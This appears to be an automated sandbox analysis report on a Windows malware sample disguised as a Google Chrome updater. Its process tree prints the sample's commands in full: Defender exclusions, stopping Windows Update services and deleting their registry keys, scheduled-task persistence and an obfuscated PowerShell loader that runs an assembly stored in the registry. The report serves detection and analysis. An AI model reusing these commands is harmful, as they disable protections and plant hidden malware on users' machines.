Analysis

  • max time kernel
    43s
  • max time network
    79s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2023 18:05

General

  • Target

    dmi1dfg7n.exe

  • Size

    2.8MB

  • MD5

    9253ed091d81e076a3037e12af3dc871

  • SHA1

    ec02829a25b3bf57ad061bbe54180d0c99c76981

  • SHA256

    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

  • SHA512

    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

  • SSDEEP

    49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Stops running service(s) 3 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
    "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5088
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3804
      • C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4228
      • C:\Windows\system32\powercfg.exe
        powercfg /x -hibernate-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3396
      • C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-ac 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3024
      • C:\Windows\system32\powercfg.exe
        powercfg /x -standby-timeout-dc 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:960
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4696
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:712
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:4764
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:1036
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:4760
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:2000
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        3⤵
          PID:2204
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
          3⤵
            PID:4684
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            3⤵
            • Modifies security service
            PID:3816
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
            3⤵
              PID:2212
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
              3⤵
                PID:4032
            • C:\Windows\system32\dialer.exe
              C:\Windows\system32\dialer.exe
              2⤵
              • Drops file in Windows directory
              PID:4208
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
              2⤵
                PID:3544
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                  3⤵
                    PID:4440
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                1⤵
                  PID:4040
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                  1⤵
                    PID:2960
                  • C:\Program Files\Google\Chrome\updater.exe
                    "C:\Program Files\Google\Chrome\updater.exe"
                    1⤵
                      PID:2068
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                        2⤵
                          PID:4888
                      • C:\Windows\System32\dllhost.exe
                        C:\Windows\System32\dllhost.exe /Processid:{0e7e27f3-98ee-4acc-8ec2-14a632d26d32}
                        1⤵
                          PID:1728
                        • C:\Windows\system32\WerFault.exe
                          C:\Windows\system32\WerFault.exe -pss -s 444 -p 600 -ip 600
                          1⤵
                            PID:4836
                          • C:\Windows\system32\WerFault.exe
                            C:\Windows\system32\WerFault.exe -u -p 600 -s 760
                            1⤵
                            • Program crash
                            PID:4772
                          • C:\Windows\system32\sihost.exe
                            sihost.exe
                            1⤵
                              PID:4276
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              1⤵
                                PID:2300

                              Network

                              MITRE ATT&CK Matrix ATT&CK v13

                              Persistence

                              Create or Modify System Process

                              2
                              T1543

                              Windows Service

                              2
                              T1543.003

                              Privilege Escalation

                              Create or Modify System Process

                              2
                              T1543

                              Windows Service

                              2
                              T1543.003

                              Defense Evasion

                              Modify Registry

                              1
                              T1112

                              Impair Defenses

                              1
                              T1562

                              Impact

                              Service Stop

                              1
                              T1489

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Program Files\Google\Chrome\updater.exe
                                Filesize

                                2.8MB

                                MD5

                                eb27bb8cfa99d659e4fe023e9002ecd1

                                SHA1

                                c783400302fdfae0518269c5a5a8d4bad29f42a3

                                SHA256

                                9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                SHA512

                                ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                Filesize

                                2KB

                                MD5

                                d85ba6ff808d9e5444a4b369f5bc2730

                                SHA1

                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                SHA256

                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                SHA512

                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                944B

                                MD5

                                d28a889fd956d5cb3accfbaf1143eb6f

                                SHA1

                                157ba54b365341f8ff06707d996b3635da8446f7

                                SHA256

                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                SHA512

                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                1KB

                                MD5

                                678632dc0f62d441eaffc8edc04ec667

                                SHA1

                                65169bc3a33472bffdf9dd35e51d726ea5a35df9

                                SHA256

                                c7fb7fc5c953d8898e875af42c7cbe9c19b2003376d48de14dc6b0ad51ed0321

                                SHA512

                                c0ad295b78b72aefefaac6e8b1e86214e01617cb645659a0a1388329911a38118c9614d6f820f697e7161bbaeeca11452aaeec4c7a2244a9f8cd0fe1145ea312

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fiodzlom.b5i.ps1
                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • memory/432-270-0x0000020C8A2C0000-0x0000020C8A2EA000-memory.dmp
                                Filesize

                                168KB

                              • memory/432-264-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/432-262-0x0000020C8A2C0000-0x0000020C8A2EA000-memory.dmp
                                Filesize

                                168KB

                              • memory/600-245-0x0000020CD1210000-0x0000020CD123A000-memory.dmp
                                Filesize

                                168KB

                              • memory/600-303-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/600-251-0x00007FF8B806F000-0x00007FF8B8070000-memory.dmp
                                Filesize

                                4KB

                              • memory/600-304-0x0000020CD1210000-0x0000020CD123A000-memory.dmp
                                Filesize

                                168KB

                              • memory/600-248-0x00007FF8B806D000-0x00007FF8B806E000-memory.dmp
                                Filesize

                                4KB

                              • memory/600-297-0x0000020CD1210000-0x0000020CD123A000-memory.dmp
                                Filesize

                                168KB

                              • memory/600-242-0x0000020CD11E0000-0x0000020CD1203000-memory.dmp
                                Filesize

                                140KB

                              • memory/652-267-0x00007FF8B806C000-0x00007FF8B806D000-memory.dmp
                                Filesize

                                4KB

                              • memory/652-263-0x00007FF8B806D000-0x00007FF8B806E000-memory.dmp
                                Filesize

                                4KB

                              • memory/652-265-0x00007FF8B806F000-0x00007FF8B8070000-memory.dmp
                                Filesize

                                4KB

                              • memory/652-246-0x000001DA12510000-0x000001DA1253A000-memory.dmp
                                Filesize

                                168KB

                              • memory/652-256-0x000001DA12510000-0x000001DA1253A000-memory.dmp
                                Filesize

                                168KB

                              • memory/652-249-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/740-273-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/740-272-0x0000021698CE0000-0x0000021698D0A000-memory.dmp
                                Filesize

                                168KB

                              • memory/740-309-0x0000021698CE0000-0x0000021698D0A000-memory.dmp
                                Filesize

                                168KB

                              • memory/884-277-0x000001BAEA170000-0x000001BAEA19A000-memory.dmp
                                Filesize

                                168KB

                              • memory/884-285-0x000001BAEA170000-0x000001BAEA19A000-memory.dmp
                                Filesize

                                168KB

                              • memory/884-281-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/936-375-0x0000016D1E540000-0x0000016D1E56A000-memory.dmp
                                Filesize

                                168KB

                              • memory/936-286-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/936-288-0x0000016D1E540000-0x0000016D1E56A000-memory.dmp
                                Filesize

                                168KB

                              • memory/936-284-0x0000016D1E540000-0x0000016D1E56A000-memory.dmp
                                Filesize

                                168KB

                              • memory/940-268-0x0000020A525D0000-0x0000020A525FA000-memory.dmp
                                Filesize

                                168KB

                              • memory/940-253-0x0000020A525D0000-0x0000020A525FA000-memory.dmp
                                Filesize

                                168KB

                              • memory/940-257-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/960-153-0x00000186DCDD0000-0x00000186DCDE0000-memory.dmp
                                Filesize

                                64KB

                              • memory/960-198-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/960-165-0x00000186DCDD0000-0x00000186DCDE0000-memory.dmp
                                Filesize

                                64KB

                              • memory/960-164-0x00000186DCDD0000-0x00000186DCDE0000-memory.dmp
                                Filesize

                                64KB

                              • memory/960-152-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/1016-258-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/1016-254-0x00000197E29A0000-0x00000197E29CA000-memory.dmp
                                Filesize

                                168KB

                              • memory/1016-269-0x00000197E29A0000-0x00000197E29CA000-memory.dmp
                                Filesize

                                168KB

                              • memory/1092-291-0x0000015A54B70000-0x0000015A54B9A000-memory.dmp
                                Filesize

                                168KB

                              • memory/1092-290-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/1092-287-0x0000015A54B70000-0x0000015A54B9A000-memory.dmp
                                Filesize

                                168KB

                              • memory/1156-296-0x00000126CBD30000-0x00000126CBD5A000-memory.dmp
                                Filesize

                                168KB

                              • memory/1156-298-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/1204-301-0x000002448CD50000-0x000002448CD7A000-memory.dmp
                                Filesize

                                168KB

                              • memory/1204-302-0x00007FF878050000-0x00007FF878060000-memory.dmp
                                Filesize

                                64KB

                              • memory/1308-314-0x000001FBBF5C0000-0x000001FBBF5EA000-memory.dmp
                                Filesize

                                168KB

                              • memory/1360-324-0x0000017993170000-0x000001799319A000-memory.dmp
                                Filesize

                                168KB

                              • memory/1396-330-0x00000138BBD80000-0x00000138BBDAA000-memory.dmp
                                Filesize

                                168KB

                              • memory/1412-336-0x000002AFC9BB0000-0x000002AFC9BDA000-memory.dmp
                                Filesize

                                168KB

                              • memory/1480-341-0x000001DF109B0000-0x000001DF109DA000-memory.dmp
                                Filesize

                                168KB

                              • memory/1576-381-0x0000023E5BD40000-0x0000023E5BD6A000-memory.dmp
                                Filesize

                                168KB

                              • memory/1664-364-0x00000191AA140000-0x00000191AA16A000-memory.dmp
                                Filesize

                                168KB

                              • memory/1728-235-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/1728-230-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/1728-239-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/1728-236-0x00007FF8B7400000-0x00007FF8B74BE000-memory.dmp
                                Filesize

                                760KB

                              • memory/1728-234-0x00007FF8B7FD0000-0x00007FF8B81C5000-memory.dmp
                                Filesize

                                2.0MB

                              • memory/1728-231-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/1728-229-0x0000000140000000-0x0000000140042000-memory.dmp
                                Filesize

                                264KB

                              • memory/1840-370-0x0000019850540000-0x000001985056A000-memory.dmp
                                Filesize

                                168KB

                              • memory/2068-306-0x00007FF7A0310000-0x00007FF7A05D8000-memory.dmp
                                Filesize

                                2.8MB

                              • memory/2068-259-0x00007FF7A0310000-0x00007FF7A05D8000-memory.dmp
                                Filesize

                                2.8MB

                              • memory/2944-169-0x00007FF7049B0000-0x00007FF704C78000-memory.dmp
                                Filesize

                                2.8MB

                              • memory/2944-133-0x00007FF7049B0000-0x00007FF704C78000-memory.dmp
                                Filesize

                                2.8MB

                              • memory/2960-210-0x0000019BC18D0000-0x0000019BC18E0000-memory.dmp
                                Filesize

                                64KB

                              • memory/2960-228-0x00007FF8B7400000-0x00007FF8B74BE000-memory.dmp
                                Filesize

                                760KB

                              • memory/2960-212-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/2960-227-0x00007FF8B7FD0000-0x00007FF8B81C5000-memory.dmp
                                Filesize

                                2.0MB

                              • memory/2960-214-0x0000019BC18D0000-0x0000019BC18E0000-memory.dmp
                                Filesize

                                64KB

                              • memory/2960-238-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/3544-176-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/3544-177-0x0000022CD0A70000-0x0000022CD0A80000-memory.dmp
                                Filesize

                                64KB

                              • memory/3544-183-0x0000022CD0A70000-0x0000022CD0A80000-memory.dmp
                                Filesize

                                64KB

                              • memory/3544-196-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/3544-193-0x0000022CD0A70000-0x0000022CD0A80000-memory.dmp
                                Filesize

                                64KB

                              • memory/4040-282-0x0000000003E30000-0x0000000003E40000-memory.dmp
                                Filesize

                                64KB

                              • memory/4040-334-0x00000000061C0000-0x00000000061DA000-memory.dmp
                                Filesize

                                104KB

                              • memory/4040-293-0x0000000003E30000-0x0000000003E40000-memory.dmp
                                Filesize

                                64KB

                              • memory/4040-237-0x00000000052D0000-0x00000000052EE000-memory.dmp
                                Filesize

                                120KB

                              • memory/4040-275-0x0000000074A80000-0x0000000075230000-memory.dmp
                                Filesize

                                7.7MB

                              • memory/4040-215-0x0000000004300000-0x0000000004322000-memory.dmp
                                Filesize

                                136KB

                              • memory/4040-279-0x0000000003E30000-0x0000000003E40000-memory.dmp
                                Filesize

                                64KB

                              • memory/4040-217-0x0000000004C90000-0x0000000004CF6000-memory.dmp
                                Filesize

                                408KB

                              • memory/4040-216-0x00000000043A0000-0x0000000004406000-memory.dmp
                                Filesize

                                408KB

                              • memory/4040-213-0x0000000003E30000-0x0000000003E40000-memory.dmp
                                Filesize

                                64KB

                              • memory/4040-208-0x0000000003CF0000-0x0000000003D26000-memory.dmp
                                Filesize

                                216KB

                              • memory/4040-209-0x0000000074A80000-0x0000000075230000-memory.dmp
                                Filesize

                                7.7MB

                              • memory/4040-211-0x0000000004470000-0x0000000004A98000-memory.dmp
                                Filesize

                                6.2MB

                              • memory/4208-194-0x00007FF780DA0000-0x00007FF780DF6000-memory.dmp
                                Filesize

                                344KB

                              • memory/4276-371-0x0000028979E50000-0x0000028979E7A000-memory.dmp
                                Filesize

                                168KB

                              • memory/4276-352-0x00007FF8B7FD0000-0x00007FF8B81C5000-memory.dmp
                                Filesize

                                2.0MB

                              • memory/4276-346-0x0000028979E50000-0x0000028979E7A000-memory.dmp
                                Filesize

                                168KB

                              • memory/5088-147-0x0000023EA53D0000-0x0000023EA53E0000-memory.dmp
                                Filesize

                                64KB

                              • memory/5088-144-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB

                              • memory/5088-134-0x0000023E8CCF0000-0x0000023E8CD12000-memory.dmp
                                Filesize

                                136KB

                              • memory/5088-146-0x0000023EA53D0000-0x0000023EA53E0000-memory.dmp
                                Filesize

                                64KB

                              • memory/5088-145-0x0000023EA53D0000-0x0000023EA53E0000-memory.dmp
                                Filesize

                                64KB

                              • memory/5088-150-0x00007FF899500000-0x00007FF899FC1000-memory.dmp
                                Filesize

                                10.8MB